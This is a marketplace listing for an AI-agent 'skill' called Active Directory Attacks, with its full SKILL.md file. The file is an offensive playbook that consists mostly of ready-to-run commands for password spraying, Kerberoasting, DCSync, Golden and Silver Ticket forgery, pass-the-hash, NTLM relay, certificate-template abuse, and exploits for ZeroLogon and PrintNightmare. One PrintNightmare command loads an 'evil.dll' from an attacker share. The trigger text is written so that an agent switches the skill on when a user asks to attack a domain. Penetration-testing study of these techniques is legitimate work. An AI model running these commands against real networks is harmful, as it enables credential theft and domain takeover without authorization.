How do I install Active Directory Attacks?

Install Active Directory Attacks with a single command: npx mdskills install sickn33/active-directory-attacks. This downloads the skill files into your project and your AI agent picks them up automatically.

What platforms support Active Directory Attacks?

Active Directory Attacks works with Claude Code, Claude Desktop, Cursor, Vscode Copilot, Windsurf, Continue Dev, Codex, Gemini Cli, Amp, Roo Code, Goose, Opencode, Trae, Qodo, Command Code. Skills use the open SKILL.md format which is compatible with any AI coding agent that reads markdown instructions.

← Back to skills

Active Directory Attacks

Name: Active Directory Attacks: AI Agent Skill
Rating: 8 (1 reviews)
Author: sickn33

Verified

Testing & QAIntermediate

This skill should be used when the user asks to "attack Active Directory", "exploit AD", "Kerberoasting", "DCSync", "pass-the-hash", "BloodHound enumeration", "Golden Ticket", "Silver Ticket", "AS-REP roasting", "NTLM relay", or needs guidance on Windows domain penetration testing.

by @sickn330Updated 2 weeks ago

Add this skill

npx mdskills install sickn33/active-directory-attacks

Fork & Edit

Skill Advisor8.0

Comprehensive offensive AD security guide with actionable commands and troubleshooting

+Provides specific command syntax for multiple attack vectors
+Includes troubleshooting table and clock sync prerequisites
+Organizes attacks by type with quick reference tables
-Lacks validation on user inputs for shell commands creating injection risk

SKILL.md

Edit in Browser

1---
2name: Active Directory Attacks
3description: This skill should be used when the user asks to "attack Active Directory", "exploit AD", "Kerberoasting", "DCSync", "pass-the-hash", "BloodHound enumeration", "Golden Ticket", "Silver Ticket", "AS-REP roasting", "NTLM relay", or needs guidance on Windows domain penetration testing.
4metadata:
5  author: zebbern
6  version: "1.1"
7---
8 
9# Active Directory Attacks
10 
11## Purpose
12 
13Provide comprehensive techniques for attacking Microsoft Active Directory environments. Covers reconnaissance, credential harvesting, Kerberos attacks, lateral movement, privilege escalation, and domain dominance for red team operations and penetration testing.
14 
15## Inputs/Prerequisites
16 
17- Kali Linux or Windows attack platform
18- Domain user credentials (for most attacks)
19- Network access to Domain Controller
20- Tools: Impacket, Mimikatz, BloodHound, Rubeus, CrackMapExec
21 
22## Outputs/Deliverables
23 
24- Domain enumeration data
25- Extracted credentials and hashes
26- Kerberos tickets for impersonation
27- Domain Administrator access
28- Persistent access mechanisms
29 
30---
31 
32## Essential Tools
33 
34| Tool | Purpose |
35|------|---------|
36| BloodHound | AD attack path visualization |
37| Impacket | Python AD attack tools |
38| Mimikatz | Credential extraction |
39| Rubeus | Kerberos attacks |
40| CrackMapExec | Network exploitation |
41| PowerView | AD enumeration |
42| Responder | LLMNR/NBT-NS poisoning |
43 
44---
45 
46## Core Workflow
47 
48### Step 1: Kerberos Clock Sync
49 
50Kerberos requires clock synchronization (±5 minutes):
51 
52```bash
53# Detect clock skew
54nmap -sT 10.10.10.10 -p445 --script smb2-time
55 
56# Fix clock on Linux
57sudo date -s "14 APR 2024 18:25:16"
58 
59# Fix clock on Windows
60net time /domain /set
61 
62# Fake clock without changing system time
63faketime -f '+8h' <command>
64```
65 
66### Step 2: AD Reconnaissance with BloodHound
67 
68```bash
69# Start BloodHound
70neo4j console
71bloodhound --no-sandbox
72 
73# Collect data with SharpHound
74.\SharpHound.exe -c All
75.\SharpHound.exe -c All --ldapusername user --ldappassword pass
76 
77# Python collector (from Linux)
78bloodhound-python -u 'user' -p 'password' -d domain.local -ns 10.10.10.10 -c all
79```
80 
81### Step 3: PowerView Enumeration
82 
83```powershell
84# Get domain info
85Get-NetDomain
86Get-DomainSID
87Get-NetDomainController
88 
89# Enumerate users
90Get-NetUser
91Get-NetUser -SamAccountName targetuser
92Get-UserProperty -Properties pwdlastset
93 
94# Enumerate groups
95Get-NetGroupMember -GroupName "Domain Admins"
96Get-DomainGroup -Identity "Domain Admins" | Select-Object -ExpandProperty Member
97 
98# Find local admin access
99Find-LocalAdminAccess -Verbose
100 
101# User hunting
102Invoke-UserHunter
103Invoke-UserHunter -Stealth
104```
105 
106---
107 
108## Credential Attacks
109 
110### Password Spraying
111 
112```bash
113# Using kerbrute
114./kerbrute passwordspray -d domain.local --dc 10.10.10.10 users.txt Password123
115 
116# Using CrackMapExec
117crackmapexec smb 10.10.10.10 -u users.txt -p 'Password123' --continue-on-success
118```
119 
120### Kerberoasting
121 
122Extract service account TGS tickets and crack offline:
123 
124```bash
125# Impacket
126GetUserSPNs.py domain.local/user:password -dc-ip 10.10.10.10 -request -outputfile hashes.txt
127 
128# Rubeus
129.\Rubeus.exe kerberoast /outfile:hashes.txt
130 
131# CrackMapExec
132crackmapexec ldap 10.10.10.10 -u user -p password --kerberoast output.txt
133 
134# Crack with hashcat
135hashcat -m 13100 hashes.txt rockyou.txt
136```
137 
138### AS-REP Roasting
139 
140Target accounts with "Do not require Kerberos preauthentication":
141 
142```bash
143# Impacket
144GetNPUsers.py domain.local/ -usersfile users.txt -dc-ip 10.10.10.10 -format hashcat
145 
146# Rubeus
147.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.txt
148 
149# Crack with hashcat
150hashcat -m 18200 hashes.txt rockyou.txt
151```
152 
153### DCSync Attack
154 
155Extract credentials directly from DC (requires Replicating Directory Changes rights):
156 
157```bash
158# Impacket
159secretsdump.py domain.local/admin:password@10.10.10.10 -just-dc-user krbtgt
160 
161# Mimikatz
162lsadump::dcsync /domain:domain.local /user:krbtgt
163lsadump::dcsync /domain:domain.local /user:Administrator
164```
165 
166---
167 
168## Kerberos Ticket Attacks
169 
170### Pass-the-Ticket (Golden Ticket)
171 
172Forge TGT with krbtgt hash for any user:
173 
174```powershell
175# Get krbtgt hash via DCSync first
176# Mimikatz - Create Golden Ticket
177kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-xxx /krbtgt:HASH /id:500 /ptt
178 
179# Impacket
180ticketer.py -nthash KRBTGT_HASH -domain-sid S-1-5-21-xxx -domain domain.local Administrator
181export KRB5CCNAME=Administrator.ccache
182psexec.py -k -no-pass domain.local/Administrator@dc.domain.local
183```
184 
185### Silver Ticket
186 
187Forge TGS for specific service:
188 
189```powershell
190# Mimikatz
191kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-xxx /target:server.domain.local /service:cifs /rc4:SERVICE_HASH /ptt
192```
193 
194### Pass-the-Hash
195 
196```bash
197# Impacket
198psexec.py domain.local/Administrator@10.10.10.10 -hashes :NTHASH
199wmiexec.py domain.local/Administrator@10.10.10.10 -hashes :NTHASH
200smbexec.py domain.local/Administrator@10.10.10.10 -hashes :NTHASH
201 
202# CrackMapExec
203crackmapexec smb 10.10.10.10 -u Administrator -H NTHASH -d domain.local
204crackmapexec smb 10.10.10.10 -u Administrator -H NTHASH --local-auth
205```
206 
207### OverPass-the-Hash
208 
209Convert NTLM hash to Kerberos ticket:
210 
211```bash
212# Impacket
213getTGT.py domain.local/user -hashes :NTHASH
214export KRB5CCNAME=user.ccache
215 
216# Rubeus
217.\Rubeus.exe asktgt /user:user /rc4:NTHASH /ptt
218```
219 
220---
221 
222## NTLM Relay Attacks
223 
224### Responder + ntlmrelayx
225 
226```bash
227# Start Responder (disable SMB/HTTP for relay)
228responder -I eth0 -wrf
229 
230# Start relay
231ntlmrelayx.py -tf targets.txt -smb2support
232 
233# LDAP relay for delegation attack
234ntlmrelayx.py -t ldaps://dc.domain.local -wh attacker-wpad --delegate-access
235```
236 
237### SMB Signing Check
238 
239```bash
240crackmapexec smb 10.10.10.0/24 --gen-relay-list targets.txt
241```
242 
243---
244 
245## Certificate Services Attacks (AD CS)
246 
247### ESC1 - Misconfigured Templates
248 
249```bash
250# Find vulnerable templates
251certipy find -u user@domain.local -p password -dc-ip 10.10.10.10
252 
253# Exploit ESC1
254certipy req -u user@domain.local -p password -ca CA-NAME -target dc.domain.local -template VulnTemplate -upn administrator@domain.local
255 
256# Authenticate with certificate
257certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10
258```
259 
260### ESC8 - Web Enrollment Relay
261 
262```bash
263ntlmrelayx.py -t http://ca.domain.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
264```
265 
266---
267 
268## Critical CVEs
269 
270### ZeroLogon (CVE-2020-1472)
271 
272```bash
273# Check vulnerability
274crackmapexec smb 10.10.10.10 -u '' -p '' -M zerologon
275 
276# Exploit
277python3 cve-2020-1472-exploit.py DC01 10.10.10.10
278 
279# Extract hashes
280secretsdump.py -just-dc domain.local/DC01\$@10.10.10.10 -no-pass
281 
282# Restore password (important!)
283python3 restorepassword.py domain.local/DC01@DC01 -target-ip 10.10.10.10 -hexpass HEXPASSWORD
284```
285 
286### PrintNightmare (CVE-2021-1675)
287 
288```bash
289# Check for vulnerability
290rpcdump.py @10.10.10.10 | grep 'MS-RPRN'
291 
292# Exploit (requires hosting malicious DLL)
293python3 CVE-2021-1675.py domain.local/user:pass@10.10.10.10 '\\attacker\share\evil.dll'
294```
295 
296### samAccountName Spoofing (CVE-2021-42278/42287)
297 
298```bash
299# Automated exploitation
300python3 sam_the_admin.py "domain.local/user:password" -dc-ip 10.10.10.10 -shell
301```
302 
303---
304 
305## Quick Reference
306 
307| Attack | Tool | Command |
308|--------|------|---------|
309| Kerberoast | Impacket | `GetUserSPNs.py domain/user:pass -request` |
310| AS-REP Roast | Impacket | `GetNPUsers.py domain/ -usersfile users.txt` |
311| DCSync | secretsdump | `secretsdump.py domain/admin:pass@DC` |
312| Pass-the-Hash | psexec | `psexec.py domain/user@target -hashes :HASH` |
313| Golden Ticket | Mimikatz | `kerberos::golden /user:Admin /krbtgt:HASH` |
314| Spray | kerbrute | `kerbrute passwordspray -d domain users.txt Pass` |
315 
316---
317 
318## Constraints
319 
320**Must:**
321- Synchronize time with DC before Kerberos attacks
322- Have valid domain credentials for most attacks
323- Document all compromised accounts
324 
325**Must Not:**
326- Lock out accounts with excessive password spraying
327- Modify production AD objects without approval
328- Leave Golden Tickets without documentation
329 
330**Should:**
331- Run BloodHound for attack path discovery
332- Check for SMB signing before relay attacks
333- Verify patch levels for CVE exploitation
334 
335---
336 
337## Examples
338 
339### Example 1: Domain Compromise via Kerberoasting
340 
341```bash
342# 1. Find service accounts with SPNs
343GetUserSPNs.py domain.local/lowpriv:password -dc-ip 10.10.10.10
344 
345# 2. Request TGS tickets
346GetUserSPNs.py domain.local/lowpriv:password -dc-ip 10.10.10.10 -request -outputfile tgs.txt
347 
348# 3. Crack tickets
349hashcat -m 13100 tgs.txt rockyou.txt
350 
351# 4. Use cracked service account
352psexec.py domain.local/svc_admin:CrackedPassword@10.10.10.10
353```
354 
355### Example 2: NTLM Relay to LDAP
356 
357```bash
358# 1. Start relay targeting LDAP
359ntlmrelayx.py -t ldaps://dc.domain.local --delegate-access
360 
361# 2. Trigger authentication (e.g., via PrinterBug)
362python3 printerbug.py domain.local/user:pass@target 10.10.10.12
363 
364# 3. Use created machine account for RBCD attack
365```
366 
367---
368 
369## Troubleshooting
370 
371| Issue | Solution |
372|-------|----------|
373| Clock skew too great | Sync time with DC or use faketime |
374| Kerberoasting returns empty | No service accounts with SPNs |
375| DCSync access denied | Need Replicating Directory Changes rights |
376| NTLM relay fails | Check SMB signing, try LDAP target |
377| BloodHound empty | Verify collector ran with correct creds |
378 
379---
380 
381## Additional Resources
382 
383For advanced techniques including delegation attacks, GPO abuse, RODC attacks, SCCM/WSUS deployment, ADCS exploitation, trust relationships, and Linux AD integration, see [references/advanced-attacks.md](references/advanced-attacks.md).
384

Full transparency — inspect the skill content before installing.